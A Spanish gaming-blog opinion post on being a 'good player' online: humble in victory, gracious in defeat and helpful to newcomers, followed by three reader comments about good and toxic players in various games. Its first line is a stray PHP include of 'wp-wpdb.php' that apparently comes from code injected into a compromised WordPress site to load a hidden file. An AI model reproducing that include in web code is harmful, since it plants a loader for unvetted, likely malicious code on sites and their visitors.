if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Sé un buen jugador en el modo online – La Fortaleza de LeChuck

Sé un buen jugador en el modo online

«¿Buen jugador? ¡A mí en el multijugador online no me gana nadie! ¡Soy el mejor! Soy mejor incluso que los jugadores asiáticos». Si has dicho esto al ver el título de la entrada, me alegro por ti, pero la verdad es que con lo de «buen jugador» no me estoy refiriendo a los increíbles jugadores que hay en el modo online de tantos y tantos juegos sino que me estoy refiriendo a otra cosa bien distinta ya que en esto del multijugador online se puede ser muy bueno y muy malo al mismo tiempo.

Me explico, hace un tiempo Largo LaGrande nos habló de los berrinches que cogen, y seguirán cogiendo, los jugadores, llamémosles apasionados en demasía, en los modos online más competitivos de nuestra generación. A nadie le gusta perder pero ya sabéis que las derrotas hay que saber aceptarlas y los ejemplos de los que nos habló Largo en su entrada son ejemplos de jugadores que, o bien no quieren aceptarlas o simplemente es que no saben hacerlo. Pero Largo no solo habló de la derrota sino que también lo hizo de la victoria. La victoria, uno de esos pequeños momentos que da sentido a la vida de todo gamer.

La humildad en el juego online es una de las cosas que diferencian a un buen campeón de otros no tan buenos. Como ya he dicho, se ha de saber perder pero también se ha de saber ganar.

Hay muchos jugadores que son todo un ejemplo a seguir. Ya no solo son humildes en la victoria y saben aceptar las derrotas sino que además se interesan en ayudar al resto de jugadores cuando estos lo necesitan. Pero por si fuera poco, también ayudan a calmar los ánimos cuando algo, y más que algo tendría que decir alguien, no funciona del todo bien.
Me gustaría que guardásemos tres líneas de silencio por todos esos jugadores que altruísticamente ofrecen su sabiduría para el beneficio de los jugadores que acaban de iniciar su aventura online. 
Tristemente, creo que en el juego online siempre existirán los «malos jugadores» y lo que es más triste aún es que parece ser que nunca se darán cuenta de que insultando, dejando partidas cojas (véase por ejemplo League of Legends), desanimando al equipo, etc. lo único que consiguen es que la inminente derrota llegue todavía más rápido si cabe.

El juego online sería un lugar mejor si todos intentáramos ser un poco más como los «buenos jugadores». Démosles las gracias cada vez que los veamos, ellos son luz en medio de la oscuridad, son como nuestro Virgilio particular que nos guía a través del infierno. ¿Qué sería de nosotros sin ellos? Quién sabe, quizás tú también seas o llegues a ser un «buen jugador».
Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

7 comentarios

  1. El mundo multijugador online está lleno de todos los tipos, ejemplos vividos.

    L4D- Encontrarte de casualidad entre un grupo de Españoles, y que te pregunten si has jugado mucho al juego (para valorar si eres bueno) pues les contesto que hombre bastente, unas 300 horas, y ya saltan con "Bah entonces no eres tan bueno, son pocas horas blablabla" Acabamos las 5 fases

  2. Aprovechar las reglas para hacer el cafre y rayar al personal. El Quickscope ese es de las cosas más odiosas que he visto en mi vida, jamás había visto hacer el subnormal tanto a la gente, y como no, tenía que venir de Call of Duty. Estar jugando una partida en serio y ver como el tonto del enemigo se está tirando de arriba dando vueltas para intentar matarte así ¿Pero tu eres tooooontttooooo?

  3. A mí en el Team Fortress 2 me empezó a apalizar uno, y muy amablemente me explicó la estrategia adecuada para ese tipo de situaciones, y desde entonces disfruto bastante más del juego. Esta gente es la que mola. Tampoco juego mucho a otros online, pero cuando probé el WoW también me ayudaron mucho (porque tenía un pj femenino).

Dejar un comentario